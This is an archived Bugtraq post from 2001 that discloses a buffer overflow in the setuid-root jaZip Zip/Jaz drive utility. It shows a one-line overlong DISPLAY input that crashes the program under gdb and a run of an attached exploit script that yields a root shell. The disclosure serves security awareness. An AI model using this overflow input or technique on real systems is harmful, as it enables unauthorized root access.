OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: teleh0r (teleh0rDOGLOVER.COM)
Date: Sun Jan 14 2001 - 11:05:48 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Dear, Bugtraq.

    jaZip is a program for managing an Iomega Zip or Jaz drive.
    It is often installed setuid root - and because of a buffer
    overflow it is possible for regular users to become root.

    Please excuse me if this was know. Please note that I can not
    guarantee that this information is correct.

    Tested rpm:
    ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
    RPMS/jaZip-0.32-2.i386.rpm

      [rootlocalhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
      [rootlocalhost /root]# gdb /usr/X11R6/bin/jazip
      GNU gdb 19991004
      Copyright 1998 Free Software Foundation, Inc.
      (gdb) r
      Starting program: /usr/X11R6/bin/jazip

      Program received signal SIGSEGV, Segmentation fault.
      0x41414141 in ?? ()
      ----
      [teleh0rlocalhost teleh0r]$ rpm -q jaZip
      jaZip-0.32-2
      [teleh0rlocalhost teleh0r]$ ./jazip-exploit.pl
      Address: 0xbffff7ac
      bash#

    Exploit attached.

    Sincerely yours,
    teleh0r

    --
    To avoid criticism, do nothing, say nothing, be nothing.
                    -- Elbert Hubbard